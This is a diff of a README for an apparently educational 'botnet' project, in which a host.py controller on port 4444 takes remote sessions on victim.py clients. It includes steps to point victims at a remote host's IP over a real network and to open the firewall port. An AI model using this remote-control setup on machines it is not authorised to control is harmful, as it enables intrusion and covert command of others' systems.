LayerZeroUNLV/botnet/README.md

 Shell#: exit
 *Center: quit
 ```
 ---

 ## Testing Multiple Victims
 To test with multiple victims on the same machine:
 1. Start `host.py` in one terminal
 2. Start multiple instances of `victim.py` in separate terminals
 3. Use `targets` to see all connected victims
 4. Use `session <#>` to control each one individually
 ---

 ## Network Configuration
 ### Running on Same Device (Testing)
 - Host listens on: `0.0.0.0:4444`
 - Victim connects to: `127.0.0.1:4444`
 ### Running on Different Devices (Real Network)
 1. Find your host computer's IP address:
    ```bash
    ifconfig  # macOS/Linux
    ipconfig  # Windows
    ```
-2. Update `victim.py` line 184 to use your host's actual IP:
+2. Update `victim.py` to use your host's actual IP:
    ```python
    server('YOUR_HOST_IP', 4444)  # Instead of '127.0.0.1'
    ```
 3. Ensure port 4444 is open in your firewall
 ---

 ## Troubleshooting
 ### "Can't assign requested address"
 - Make sure the host is binding to `0.0.0.0` (not a specific IP)
 ### "Connection refused"
 - Make sure the host is running BEFORE starting the victim
-- Check that port 4444 is not blocked by firewall
+- Check that port 4444 is not blocked by a firewall
 - Verify the IP address is correct
 ### Victim won't connect
 - Ensure both programs are using the same port (4444)
 - Check firewall settings
 - Verify network connectivity between machines
 ---

 ## Further Considerations
 ### Potential Improvements
 - Add encryption (TLS/SSL) for secure communication
 - Implement authentication to verify victim identity